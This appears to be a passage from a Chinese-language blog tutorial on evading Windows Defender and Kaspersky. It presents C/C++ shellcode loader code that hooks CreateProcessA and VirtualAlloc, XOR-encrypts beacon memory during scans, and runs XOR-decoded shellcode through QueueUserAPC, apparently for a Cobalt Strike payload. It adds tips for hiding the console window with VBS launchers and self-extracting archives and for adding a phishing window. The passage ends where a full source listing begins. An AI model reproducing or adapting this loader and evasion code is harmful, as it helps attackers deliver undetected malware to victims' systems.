<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">if</span> (writeMemory(&amp;hookData[hookDataNumber]))<br>       &#123;<br>           hookData[hookDataNumber].isHooked = <span class="hljs-literal">true</span>;<br>           <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;<br>       &#125;<br>       <span class="hljs-keyword">else</span> <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>   &#125;<br></code></pre></td></tr></table></figure>

<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-comment">// 切换钩子状态</span><br><span class="hljs-comment">// 钩子被安装成功后，自动启动钩子；</span><br><span class="hljs-comment">// 通过调用该函数，可以切换钩子当前状态；停止挂钩 或者 启动挂钩</span><br><span class="hljs-type">static</span> <span class="hljs-type">bool</span> <span class="hljs-title function_">change</span><span class="hljs-params">(<span class="hljs-built_in">string</span> DLLName, <span class="hljs-built_in">string</span> APIName, <span class="hljs-type">int</span> hookDataNumber)</span><br>    &#123;<br>        <span class="hljs-keyword">if</span> (writeMemory(&amp;hookData[hookDataNumber])) <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;<br>        <span class="hljs-keyword">else</span> <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>    &#125;<br><span class="hljs-comment">//因为钩子我们之前已经定义玩了 所以不再需要遍历查找这个钩子了</span><br></code></pre></td></tr></table></figure>

<h4 id=""><a href="#" class="headerlink" title=""></a></h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs c">StructHook Hook::hookData[<span class="hljs-number">2</span>];<br><span class="hljs-comment">//构造结构体 提供给后续的main方法调用</span><br>HANDLE hThread;<br><span class="hljs-comment">//使用线程池</span><br><span class="hljs-type">int</span> codeSize;<br><span class="hljs-comment">//提供给后续调用</span><br>LPVOID bAddr;<br><span class="hljs-comment">//提供给后续调用</span><br></code></pre></td></tr></table></figure>

<h4 id="-1"><a href="#-1" class="headerlink" title=""></a></h4><h4 id="MemoryTrick-真正绕过WDF行为检测的原理主体"><a href="#MemoryTrick-真正绕过WDF行为检测的原理主体" class="headerlink" title="MemoryTrick(真正绕过WDF行为检测的原理主体)"></a>MemoryTrick(真正绕过WDF行为检测的原理主体)</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs c">&#123;<br>    <span class="hljs-comment">// 挂起线程</span><br>    <span class="hljs-keyword">if</span> (SuspendThread(hThread) == <span class="hljs-number">-1</span>)<br>    &#123;<br>        <span class="hljs-built_in">cout</span> &lt;&lt; <span class="hljs-string">&quot;Suspend Thread error&quot;</span> &lt;&lt; <span class="hljs-built_in">endl</span>;<br>    &#125;<br><br>    <span class="hljs-comment">// 修改内存属性，这里和 malleable-c2 配置文件属性有关，会改成 rx 权限</span><br>    DWORD oldprotect = <span class="hljs-number">0</span>;<br>    VirtualProtect(bAddr, codeSize, PAGE_EXECUTE_READWRITE, &amp;oldprotect);<br><br>    <span class="hljs-comment">// 加密内存</span><br>    <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> i = <span class="hljs-number">0</span>; i &lt; codeSize; i++)<br>    &#123;<br>        ((<span class="hljs-type">char</span>*)bAddr)[i] = ((<span class="hljs-type">char</span>*)bAddr)[i] ^ <span class="hljs-number">11</span> ^ <span class="hljs-number">45</span> ^ <span class="hljs-number">14</span>;<br>    &#125;<br></code></pre></td></tr></table></figure>

<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs c"><br><span class="hljs-comment">// 运行真正的函数</span><br>CreateProcessA(<br>    optionsData-&gt;lpApplicationName,<br>    optionsData-&gt;lpCommandLine,<br>    optionsData-&gt;lpProcessAttributes,<br>    optionsData-&gt;lpThreadAttributes,<br>    optionsData-&gt;bInheritHandles,<br>    optionsData-&gt;dwCreationFlags,<br>    optionsData-&gt;lpEnvironment,<br>    optionsData-&gt;lpCurrentDirectory,<br>    optionsData-&gt;lpStartupInfo,<br>    optionsData-&gt;lpProcessInformation<br>);<br><br><span class="hljs-comment">// 睡眠，等待 wd 扫描和运行结束</span><br>Sleep(<span class="hljs-number">5000</span>);<br></code></pre></td></tr></table></figure>

<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-comment">// 解密内存</span><br>    <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> i = <span class="hljs-number">0</span>; i &lt; codeSize; i++)<br>    &#123;<br>        ((<span class="hljs-type">char</span>*)bAddr)[i] = ((<span class="hljs-type">char</span>*)bAddr)[i] ^ <span class="hljs-number">11</span> ^ <span class="hljs-number">45</span> ^ <span class="hljs-number">14</span>;<br>    &#125;<br><br>    <span class="hljs-comment">// 恢复线程</span><br>    ResumeThread(hThread);<br></code></pre></td></tr></table></figure>



<h4 id="int-fastcall-MyCreateProcessA-这里是为了创建一个自定义的createprocess"><a href="#int-fastcall-MyCreateProcessA-这里是为了创建一个自定义的createprocess" class="headerlink" title="int __fastcall MyCreateProcessA(这里是为了创建一个自定义的createprocess)"></a>int __fastcall MyCreateProcessA(这里是为了创建一个自定义的createprocess)</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs c">   LPCSTR lpApplicationName,<br>    LPSTR lpCommandLine, <br>    LPSECURITY_ATTRIBUTES lpProcessAttributes, <br>    LPSECURITY_ATTRIBUTES lpThreadAttributes, <br>    BOOL bInheritHandles, <br>    DWORD dwCreationFlags, <br>    LPVOID lpEnvironment, <br>    LPCSTR lpCurrentDirectory, <br>    LPSTARTUPINFOA lpStartupInfo, <br>    LPPROCESS_INFORMATION lpProcessInformation)<br>&#123;<br>    <span class="hljs-built_in">cout</span> &lt;&lt; <span class="hljs-string">&quot;into my CreateProcessA&quot;</span> &lt;&lt; <span class="hljs-built_in">endl</span>;<br></code></pre></td></tr></table></figure>

<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-comment">// 给结构体赋值，因为创建线程只能传入结构体</span><br>optionsData = (<span class="hljs-keyword">struct</span> StructOptions*)<span class="hljs-built_in">malloc</span>(<span class="hljs-keyword">sizeof</span>(<span class="hljs-keyword">struct</span> StructOptions));<br>    optionsData-&gt;lpApplicationName = lpApplicationName;<br>    optionsData-&gt;lpCommandLine = lpCommandLine;<br>    optionsData-&gt;lpProcessAttributes = lpProcessAttributes;<br>    optionsData-&gt;lpThreadAttributes = lpThreadAttributes;<br>    optionsData-&gt;bInheritHandles = bInheritHandles;<br>    optionsData-&gt;dwCreationFlags = dwCreationFlags;<br>    optionsData-&gt;lpEnvironment = lpEnvironment;<br>    optionsData-&gt;lpCurrentDirectory = lpCurrentDirectory;<br>    optionsData-&gt;lpStartupInfo = lpStartupInfo;<br>    optionsData-&gt;lpProcessInformation = lpProcessInformation;<br></code></pre></td></tr></table></figure>

<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs c">  <span class="hljs-comment">// 解除 hook</span><br>    <span class="hljs-keyword">if</span> (!Hook::change(<span class="hljs-string">&quot;kernel32.dll&quot;</span>, <span class="hljs-string">&quot;CreateProcessA&quot;</span>, <span class="hljs-number">0</span>)) <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br><br>    <span class="hljs-comment">// 创建一个新线程来完成操作 可以看到里面有个memorytrick</span><br>    HANDLE thread = CreateThread(<span class="hljs-literal">NULL</span>, <span class="hljs-number">0</span>, (LPTHREAD_START_ROUTINE)MemoryTrick, optionsData, <span class="hljs-number">0</span>, <span class="hljs-literal">NULL</span>);<br>    WaitForSingleObject(thread, INFINITE);<br><br>    <span class="hljs-comment">// 重新 hook</span><br>    <span class="hljs-keyword">if</span> (!Hook::change(<span class="hljs-string">&quot;kernel32.dll&quot;</span>, <span class="hljs-string">&quot;CreateProcessA&quot;</span>, <span class="hljs-number">0</span>)) <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>    <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>&#125;<br></code></pre></td></tr></table></figure>



<h4 id="RunCode"><a href="#RunCode" class="headerlink" title="RunCode"></a>RunCode</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">typedef</span> <span class="hljs-title function_">LPVOID</span><span class="hljs-params">(WINAPI* VAE)</span><span class="hljs-params">(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)</span>;<br></code></pre></td></tr></table></figure>

<p>做免杀的时候经常用到这个句式 但是在具体应该根据不同情况做出相应改变</p>
<p>先分段分析一下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs c">LPVOID lpAddress, 分配内存区域的地址。当你使用VirtualAlloc来提交一块以前保留的内存块的时候，lpAddress参数可以用来识别以前保留的内存块。如果这个参数是<span class="hljs-literal">NULL</span>，系统将会决定分配内存区域的位置，并且按<span class="hljs-number">64</span>-KB向上取整(roundup)。<br>SIZE_T dwSize, 要分配或者保留的区域的大小。这个参数以字节为单位，而不是页，系统会根据这个大小一直分配到下页的边界DWORD<br>flAllocationType, 分配类型 ,你可以指定或者合并以下标志：MEM_COMMIT，MEM_RESERVE和MEM_TOP_DOWN。<br>DWORD flProtect 指定了被分配区域的访问保护方式<br></code></pre></td></tr></table></figure>

<p><em>LPVOID</em>是一个没有类型的指针，也就是说你可以将<em>LPVOID</em>类型的变量赋值给任意类型的指针</p>
<p>WINAPI* VAE 就是类似于自己写的参数 可以看到下面代码有去给它赋值为VirtualAlloc”</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs c">    code = (<span class="hljs-type">char</span>*)xor_shell;<br>    codeSize = <span class="hljs-keyword">sizeof</span> xor_shell;<br><br>    <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> i = <span class="hljs-number">0</span>; i &lt; codeSize; i++)<br>    &#123;<br>        xor_shell[i] ^= <span class="hljs-number">20</span>;<br>    &#125;<br><br>异或解码<br>    <br></code></pre></td></tr></table></figure>



<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-comment">// 获取当前线程句柄</span><br>    hThread = OpenThread(THREAD_ALL_ACCESS, <span class="hljs-number">0</span>, GetCurrentThreadId());<br>    VAE pVAE = (VAE)GetProcAddress(GetModuleHandle(<span class="hljs-string">L&quot;kernel32.dll&quot;</span>), <span class="hljs-string">&quot;VirtualAlloc&quot;</span>);<br>    bAddr = (<span class="hljs-type">char</span>*)pVAE(<span class="hljs-number">0</span>, codeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);<br>    CopyMemory(bAddr, xor_shell, codeSize);<br></code></pre></td></tr></table></figure>

<figure class="highlight lisp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs lisp">QueueUserAPC((<span class="hljs-name">PAPCFUNC</span>)bAddr, hThread, (<span class="hljs-name">ULONG_PTR</span>)bAddr)<span class="hljs-comment">;</span><br></code></pre></td></tr></table></figure>

<p>QueueUserApc:函数作用,添加制定的异步函数调用(回调函数)到执行的线程的APC队列中 </p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs c">SleepEx(<span class="hljs-number">5</span>, <span class="hljs-number">1</span>);<br>*SleepEx*，*SleepEx*函数中止当前线程运行直到指定的条件被触发。当以下任意*一*点出现时，当前线程将恢复运行。<br><span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br><span class="hljs-comment">//这两个步骤每台搞懂原理</span><br></code></pre></td></tr></table></figure>







<p>&#x2F;&#x2F; 这里的调用约定 要与WINAPI一致，否则会出现堆栈不平衡的错误<br>&#x2F;&#x2F; x86 为 stdcall</p>
<p>X64 为fastcall</p>
<h4 id="LPVOID-fastcall-MyVirttualAlloc"><a href="#LPVOID-fastcall-MyVirttualAlloc" class="headerlink" title="LPVOID __fastcall MyVirttualAlloc"></a>LPVOID __fastcall MyVirttualAlloc</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs c"><br>&#123;<br>    <span class="hljs-built_in">cout</span> &lt;&lt; <span class="hljs-string">&quot;into my VirttualAlloc&quot;</span> &lt;&lt; <span class="hljs-built_in">endl</span>;<br>    <span class="hljs-comment">// 解除 hook</span><br>    <span class="hljs-keyword">if</span> (!Hook::change(<span class="hljs-string">&quot;kernel32.dll&quot;</span>, <span class="hljs-string">&quot;VirtualAlloc&quot;</span>, <span class="hljs-number">1</span>)) <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br><br>    <span class="hljs-comment">// 解除 hook 后可调用原来的函数</span><br>    codeSize = dwSize;<br>    bAddr = VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect);<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;codeSize=%d\n&quot;</span>, dwSize);<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;bAddr=%llx\n&quot;</span>, bAddr);<br><br>    <span class="hljs-comment">// 重新 hook</span><br>    <span class="hljs-keyword">if</span> (!Hook::change(<span class="hljs-string">&quot;kernel32.dll&quot;</span>, <span class="hljs-string">&quot;VirtualAlloc&quot;</span>, <span class="hljs-number">1</span>)) <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>    <span class="hljs-keyword">return</span> bAddr;<br>&#125;<br></code></pre></td></tr></table></figure>





<h4 id="main"><a href="#main" class="headerlink" title="main()"></a>main()</h4><p>执行hook调用kernel32.dll的APi creatprocessA(自定义)和VirtualAlloc(常用)</p>
<h2 id="补充"><a href="#补充" class="headerlink" title="补充"></a>补充</h2><p>利用Detours &#x3D;&#x3D;inline hook&#x3D;&#x3D; sleep 免杀卡巴斯基</p>
<p>\1. 杀软在扫描进程内存时，为了效率，并不会扫描全部的内存地址和内容，但会对关键的“可读可写可执行”的区域进行扫描查杀。<br>\2. CS在心跳时候会调用sleep函数，默认情况下，这个CS进程内的“RWX”内存区域会一直存在。会导致杀软对这块区域进行查杀。这个时候通过hook sleep函数，使其在sleep后将相关“RWX”区域的可执行权限取消。然后在要执行内存区域时重新赋予可执行权限。这样“可读可写可执行”内存区域暴露的时间就很短，有比较高的几率躲避杀软的内存查杀。<br>\3. 使用的是微软的开源hook框架Detours。</p>
<p>这个不能绕过WDF行为检测  所以就有了此篇文章的利用此方法改进绕过WDF行为检测</p>
<p>这个是inlinehook sleep </p>
<p>而我们改进的还加了inline hook execute并且hook中不仅加&#x2F;解”RWX”还进行了加&#x2F;解密</p>
<h2 id="工具优点"><a href="#工具优点" class="headerlink" title="工具优点"></a>工具优点</h2><p>就是利用hookWDF检测时间加密绕过行为检测</p>
<p>这是一个很好的思路 可以配合用在任何静态免杀上   以绕过动态查杀</p>
<h2 id="改进思路"><a href="#改进思路" class="headerlink" title="改进思路"></a>改进思路</h2><p>消息提示可以改成钓鱼窗体。</p>
<p>最好还是无窗体显现，因为其中exe点击后会启动cmd控制台。然后代码中会有回显特征。就比如执行shell whoami时 窗体会有hook回显  这个也要抹除</p>
<p>这些我们可以再波哥的uuid生成里面看一下</p>
<h2 id="尝试改进"><a href="#尝试改进" class="headerlink" title="尝试改进"></a>尝试改进</h2><h3 id="1-‘直接main方法添加"><a href="#1-‘直接main方法添加" class="headerlink" title="1.‘直接main方法添加"></a>1.‘直接main方法添加</h3><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs c++">HWND hwnd = <span class="hljs-built_in">GetForegroundWindow</span>();<br>    <span class="hljs-built_in">ShowWindow</span>(hwnd, SW_HIDE);<br></code></pre></td></tr></table></figure>

<p>有个遗憾是窗口还是会闪一下</p>
<p><img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209141503127.gif" srcset="/img/loading.gif" lazyload></p>
<p>有意思的是只有第一次会闪  之后就不会闪了</p>
<h3 id="2-调用vbs脚本，可隐藏黑框"><a href="#2-调用vbs脚本，可隐藏黑框" class="headerlink" title="2.调用vbs脚本，可隐藏黑框"></a>2.调用vbs脚本，可隐藏黑框</h3><figure class="highlight vbscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs vbscript">vbs脚本： <br><span class="hljs-keyword">set</span> objShell=wscript.<span class="hljs-built_in">createObject</span>(<span class="hljs-string">&quot;wscript.shell&quot;</span>)  <br>iReturn=objShell.Run(<span class="hljs-string">&quot;你的程序.exe&quot;</span>, <span class="hljs-number">0</span>, <span class="hljs-literal">FALSE</span>)  <br> <br><span class="hljs-comment">&#x27;Run()</span><br><span class="hljs-comment">&#x27;第一个参数是你要执行的程序的路径，</span><br><span class="hljs-comment">&#x27;第二个参数是窗口的形式，0后台运行；1正常运行；2最小化；3最大化；缺省的话表示正常运行</span><br><span class="hljs-comment">&#x27;第三个参数是表示这个脚本是等待还是继续执行，如果设为了True,脚本就会等待调用的程序退出后再向后执行。</span><br></code></pre></td></tr></table></figure>

<p>可以配合winrar的自解压(将exe合脚本解压)使用</p>
<h3 id="3-通过system-x2F-b-脚本运行"><a href="#3-通过system-x2F-b-脚本运行" class="headerlink" title="3.通过system(&#x2F;b)脚本运行"></a>3.通过system(&#x2F;b)脚本运行</h3><p>既然有2的方法 那自然也有sysstem &#x2F;b 写个脚本隐藏配合exe文件 然后用winrar打包成自解压.exe运行</p>
<h3 id="4-直接再main方法中添加-pragma-comment-linker-“-x2F-subsystem-quot-windows-quot-x2F-entry-quot-mainCRTStartup-quot-“"><a href="#4-直接再main方法中添加-pragma-comment-linker-“-x2F-subsystem-quot-windows-quot-x2F-entry-quot-mainCRTStartup-quot-“" class="headerlink" title="4.直接再main方法中添加   #pragma comment( linker, “&#x2F;subsystem:&quot;windows&quot; &#x2F;entry:&quot;mainCRTStartup&quot;“ )"></a>4.直接再main方法中添加   #pragma comment( linker, “&#x2F;subsystem:&quot;windows&quot; &#x2F;entry:&quot;mainCRTStartup&quot;“ )</h3><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-meta">#<span class="hljs-keyword">pragma</span> comment( linker, <span class="hljs-string">&quot;/subsystem:\&quot;windows\&quot; /entry:\&quot;mainCRTStartup\&quot;&quot;</span> )</span><br></code></pre></td></tr></table></figure>

<p><img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209141521843.png" srcset="/img/loading.gif" lazyload alt="image-20220914152118758"></p>
<p>第一次运行也不会闪cmd窗口</p>
<p><img src="https://cd-1307445315.cos.ap-nanjing.myqcloud.com/CD%5C202209141525541.gif" srcset="/img/loading.gif" lazyload></p>
<h3 id="5-是四方法的控制台模式版"><a href="#5-是四方法的控制台模式版" class="headerlink" title="5.是四方法的控制台模式版"></a>5.是四方法的控制台模式版</h3><p>通过项目设置，详见VS程序不显示控制台<br>首先打开“配置属性”-&gt;“链接器”-&gt;“系统”-&gt;“子系统”，设置为“Windows（&#x2F;SUBSYSTEM:WINDOWS）”，原来可能是默认为“控制台(&#x2F;SUBSYSTEM:CONSOLE)”的。<br>修改好之后，到“高级”选项中添加“入口点”：mainCRTStartup：</p>
<h3 id="6-如果加密方式没绕过的话"><a href="#6-如果加密方式没绕过的话" class="headerlink" title="6.如果加密方式没绕过的话"></a>6.如果加密方式没绕过的话</h3><p>像改进的话也很好改进  找到很多混淆加密方式 </p>
<p>想着样</p>
<p><a target="_blank" rel="noopener" href="https://ryze-t.com/2022/06/16/Windows-Defender-Bypass/">https://ryze-t.com/2022/06/16/Windows-Defender-Bypass/</a></p>
<p>解密的源码copy替换一下 很容易</p>
<p>源码</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br><span class="line">260</span><br><span class="line">261</span><br><span class="line">262</span><br><span class="line">263</span><br><span class="line">264</span><br><span class="line">265</span><br><span class="line">266</span><br><span class="line">267</span><br><span class="line">268</span><br><span class="line">269</span><br><span class="line">270</span><br><span class="line">271</span><br><span class="line">272</span><br><span class="line">273</span><br><span class="line">274</span><br><span class="line">275</span><br><span class="line">276</span><br><span class="line">277</span><br><span class="line">278</span><br><span class="line">279</span><br><span class="line">280</span><br><span class="line">281</span><br><span class="line">282</span><br><span class="line">283</span><br><span class="line">284</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;iostream&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&quot;string.h&quot;</span></span><br><span class="hljs-meta">#<span 